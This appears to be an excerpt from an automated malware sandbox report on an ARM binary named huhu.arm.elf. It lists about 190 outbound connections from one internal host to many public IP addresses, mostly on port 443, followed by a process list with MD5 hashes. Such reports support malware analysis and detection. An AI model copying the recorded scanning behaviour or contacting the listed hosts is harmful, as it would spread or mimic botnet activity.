                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22629192.168.2.1438080202.253.15.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22630192.168.2.1454622159.153.139.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22631192.168.2.143772472.163.30.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22632192.168.2.145947693.179.63.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22633192.168.2.1436552184.49.100.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22634192.168.2.143305253.12.161.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22635192.168.2.145092036.137.12.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22636192.168.2.1439740219.169.33.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22637192.168.2.1459994155.61.52.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22638192.168.2.1449754175.153.20.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22639192.168.2.1437318209.22.154.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22640192.168.2.144665240.234.171.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22641192.168.2.1455212190.115.72.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22642192.168.2.1459546210.106.82.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22643192.168.2.1432910210.68.185.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22644192.168.2.145610223.196.53.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22645192.168.2.1438132150.152.155.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22646192.168.2.144267278.198.162.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22647192.168.2.144047477.157.85.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22648192.168.2.1455280112.177.74.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22649192.168.2.1447692190.248.121.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22650192.168.2.1440528207.214.188.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22651192.168.2.1460638145.142.226.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22652192.168.2.1440628174.69.162.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22653192.168.2.145227438.20.236.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22654192.168.2.144359099.240.55.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22655192.168.2.1441652183.198.114.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22656192.168.2.1445288133.80.12.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22657192.168.2.1440670104.58.195.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22658192.168.2.1440988108.40.217.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22659192.168.2.143470099.243.100.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22660192.168.2.143575843.57.8.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22661192.168.2.1452964131.120.23.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22662192.168.2.1453670120.15.31.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22663192.168.2.1452528101.116.244.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22664192.168.2.1435962128.144.3.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22665192.168.2.1444448164.58.240.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22666192.168.2.145774057.73.150.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22667192.168.2.144078823.53.118.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22668192.168.2.143421023.205.81.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22669192.168.2.1457390101.236.149.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22670192.168.2.1443418108.81.7.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22671192.168.2.1440640130.124.229.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22672192.168.2.1458718131.108.111.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22673192.168.2.1445304173.104.96.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22674192.168.2.1455646170.137.231.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22675192.168.2.1459928125.144.20.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22676192.168.2.144762662.250.253.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22677192.168.2.145812045.183.48.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22678192.168.2.1451694148.158.169.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22679192.168.2.143613867.92.140.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22680192.168.2.145304259.225.21.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22681192.168.2.1435724171.173.54.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22682192.168.2.1434514211.8.62.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22683192.168.2.145106882.132.107.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22684192.168.2.1437830189.223.177.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22685192.168.2.144017262.148.83.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22686192.168.2.144015012.221.242.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22687192.168.2.144514646.241.115.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22688192.168.2.1457120169.135.217.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22689192.168.2.1443306213.45.119.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22690192.168.2.1456792131.32.83.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22691192.168.2.143748447.115.140.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22692192.168.2.1437874222.98.181.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22693192.168.2.1450586154.46.23.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22694192.168.2.1438224134.154.165.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22695192.168.2.143845671.251.87.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22696192.168.2.1438974109.14.151.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22697192.168.2.1438752148.69.128.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22698192.168.2.143373420.72.205.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22699192.168.2.1434272204.130.186.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22700192.168.2.143398273.47.63.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22701192.168.2.145808837.239.248.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22702192.168.2.1453876123.134.97.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22703192.168.2.14379782.95.184.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22704192.168.2.1444262114.21.165.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22705192.168.2.1432780217.230.227.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22706192.168.2.1436454198.227.101.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22707192.168.2.1448032201.67.61.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22708192.168.2.1455478123.47.21.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22709192.168.2.1443110165.170.18.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22710192.168.2.1454518157.91.79.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22711192.168.2.1456696210.78.27.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22712192.168.2.1459484125.137.238.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22713192.168.2.1440718164.179.150.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22714192.168.2.1456906190.79.106.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22715192.168.2.144944267.79.180.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22716192.168.2.1439438159.145.228.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22717192.168.2.1444438146.43.117.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22718192.168.2.143519899.189.181.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22719192.168.2.1438416172.223.55.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22720192.168.2.1457074174.51.93.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22721192.168.2.144700262.223.158.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22722192.168.2.145644632.105.5.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22723192.168.2.1435982129.69.121.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22724192.168.2.1437756216.150.218.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22725192.168.2.1437332119.74.85.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22726192.168.2.1448352200.244.199.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22727192.168.2.1452080176.156.123.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22728192.168.2.144862662.13.17.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22729192.168.2.145344220.238.136.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22730192.168.2.1443956164.97.154.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22731192.168.2.144262235.49.227.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22732192.168.2.143604223.44.93.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22733192.168.2.1437710169.41.6.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22734192.168.2.144872896.90.220.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22735192.168.2.1459218212.35.232.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22736192.168.2.144486840.119.71.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22737192.168.2.1434984179.106.249.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22738192.168.2.1440156184.123.170.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22739192.168.2.1446184173.151.167.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22740192.168.2.1433682222.90.158.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22741192.168.2.1438246206.155.210.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22742192.168.2.1445824175.121.97.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22743192.168.2.144608495.11.183.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22744192.168.2.1456778134.220.108.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22745192.168.2.145152634.109.10.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22746192.168.2.143557694.211.223.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22747192.168.2.146079047.178.23.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22748192.168.2.1436018104.218.165.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22749192.168.2.144531618.100.1.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22750192.168.2.145965417.204.161.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22751192.168.2.1437948160.236.94.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22752192.168.2.1452356187.208.46.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22753192.168.2.1443650162.86.62.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22754192.168.2.1437940128.35.93.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22755192.168.2.143964845.179.17.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22756192.168.2.144411419.65.123.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22757192.168.2.1443080111.191.12.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22758192.168.2.144896651.109.158.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22759192.168.2.143571612.102.14.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22760192.168.2.143870625.102.219.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22761192.168.2.144791842.180.145.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22762192.168.2.1439850123.245.247.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22763192.168.2.145613269.43.27.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22764192.168.2.1451930135.195.87.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22765192.168.2.1447274134.120.207.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22766192.168.2.1455104159.59.242.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22767192.168.2.1459654208.50.172.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22768192.168.2.1453740163.185.244.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22769192.168.2.143897694.95.189.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22770192.168.2.1452386152.141.25.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22771192.168.2.1441370181.1.139.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22772192.168.2.1448956137.44.202.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22773192.168.2.1453388126.157.60.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22774192.168.2.1457338190.246.160.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22775192.168.2.146048081.63.152.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22776192.168.2.144526636.138.224.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22777192.168.2.145851698.141.139.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22778192.168.2.1436718180.199.186.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22779192.168.2.145286868.207.131.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22780192.168.2.1434326155.213.45.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22781192.168.2.1433440104.100.226.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22782192.168.2.1446388195.0.239.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22783192.168.2.143328094.142.105.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22784192.168.2.1452576211.64.83.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22785192.168.2.1451970138.173.133.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22786192.168.2.1439478204.105.155.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22787192.168.2.1443732107.112.35.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22788192.168.2.1441342179.81.36.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22789192.168.2.1447104123.46.35.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22790192.168.2.1439838158.126.127.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22791192.168.2.1455918189.165.144.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22792192.168.2.1440510133.76.157.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22793192.168.2.1433714105.69.49.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22794192.168.2.1438452185.195.254.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22795192.168.2.1455556146.2.252.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22796192.168.2.1448150113.33.59.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22797192.168.2.1449888191.164.206.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22798192.168.2.144025650.104.151.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22799192.168.2.1445486120.51.184.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22800192.168.2.1443206146.105.205.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22801192.168.2.143929697.114.120.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22802192.168.2.1453494162.250.26.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22803192.168.2.143897250.147.210.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22804192.168.2.1448646107.52.200.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22805192.168.2.1438408168.108.210.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22806192.168.2.14496968.229.116.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22807192.168.2.143628442.143.85.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22808192.168.2.1440808199.11.32.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22809192.168.2.1454148192.88.137.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22810192.168.2.143896267.204.0.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22811192.168.2.1439322148.210.36.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22812192.168.2.145456470.58.246.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22813192.168.2.1445856141.121.27.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22814192.168.2.144808292.94.30.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22815192.168.2.1459756103.252.117.1458080
                                              TimestampBytes transferredDirectionData


                                              System Behavior

                                              Start time (UTC):06:02:57
                                              Start date (UTC):29/01/2024
                                              Path:/tmp/huhu.arm.elf
                                              Arguments:/tmp/huhu.arm.elf
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):06:02:57
                                              Start date (UTC):29/01/2024
                                              Path:/tmp/huhu.arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):06:02:57
                                              Start date (UTC):29/01/2024
                                              Path:/tmp/huhu.arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):06:02:57
                                              Start date (UTC):29/01/2024
                                              Path:/tmp/huhu.arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):06:02:57
                                              Start date (UTC):29/01/2024
                                              Path:/tmp/huhu.arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):06:02:57
                                              Start date (UTC):29/01/2024
                                              Path:/tmp/huhu.arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):06:02:57
                                              Start date (UTC):29/01/2024
                                              Path:/tmp/huhu.arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):06:02:59
                                              Start date (UTC):29/01/2024
                                              Path:/usr/libexec/gnome-session-binary
                                              Arguments:-
                                              File size:334664 bytes
                                              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                              Start time (UTC):06:02:59
                                              Start date (UTC):29/01/2024
                                              Path:/bin/sh
                                              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):06:02:59
                                              Start date (UTC):29/01/2024
                                              Path:/usr/libexec/gsd-print-notifications
                                              Arguments:/usr/libexec/gsd-print-notifications
                                              File size:51840 bytes
                                              MD5 hash:71539698aa691718cee775d6b9450ae2

                                              Start time (UTC):06:03:00
                                              Start date (UTC):29/01/2024
                                              Path:/usr/sbin/gdm3
                                              Arguments:-
                                              File size:453296 bytes
                                              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                              Start time (UTC):06:03:00
                                              Start date (UTC):29/01/2024
                                              Path:/etc/gdm3/PrimeOff/Default
                                              Arguments:/etc/gdm3/PrimeOff/Default
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):06:03:00
                                              Start date (UTC):29/01/2024
                                              Path:/usr/sbin/gdm3
                                              Arguments:-
                                              File size:453296 bytes
                                              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                              Start time (UTC):06:03:00
                                              Start date (UTC):29/01/2024
                                              Path:/etc/gdm3/PrimeOff/Default
                                              Arguments:/etc/gdm3/PrimeOff/Default
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):06:03:11
                                              Start date (UTC):29/01/2024
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:-
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Start time (UTC):06:03:11
                                              Start date (UTC):29/01/2024
                                              Path:/lib/systemd/systemd-user-runtime-dir
                                              Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                              File size:22672 bytes
                                              MD5 hash:d55f4b0847f88131dbcfb07435178e54